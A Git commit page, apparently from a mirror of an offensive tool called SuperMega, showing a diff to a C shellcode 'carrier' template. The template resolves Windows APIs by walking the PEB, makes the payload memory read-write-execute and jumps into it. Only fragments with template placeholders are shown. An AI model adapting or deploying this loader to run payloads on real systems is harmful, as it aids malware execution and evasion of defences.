admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: more and nicer carrier's

Browse Source
This commit is contained in:
Dobin
2024-05-19 11:44:30 +01:00
parent 849df50dc8
commit b4e7711aba
6 changed files with 169 additions and 74 deletions
Download Patch File Download Diff File Expand all files Collapse all files
data/source/carrier/peb_walk/template.c
+6 -2
View File
@@ -2,9 +2,12 @@
#include "peb_lookup.h"
//extern char *supermega_payload;
char *supermega_payload;
/* peb_walk
Standard shellcode which will resolve IAT by itself with a peb_walk
*/
int main()
{
wchar_t kernel32_dll_name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 };
@@ -107,7 +110,8 @@ int main()
_In_ DWORD flNewProtect,
_Out_ PDWORD lpflOldProtect)) _GetProcAddress((HMODULE)base, VirtualProtect_str);
if (_VirtualProtect == NULL) return 4;
_VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result); // rx
// _VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result); // rx
_VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x40, &result); // rwx
// Execute *dest
(*(void(*)())(dest))();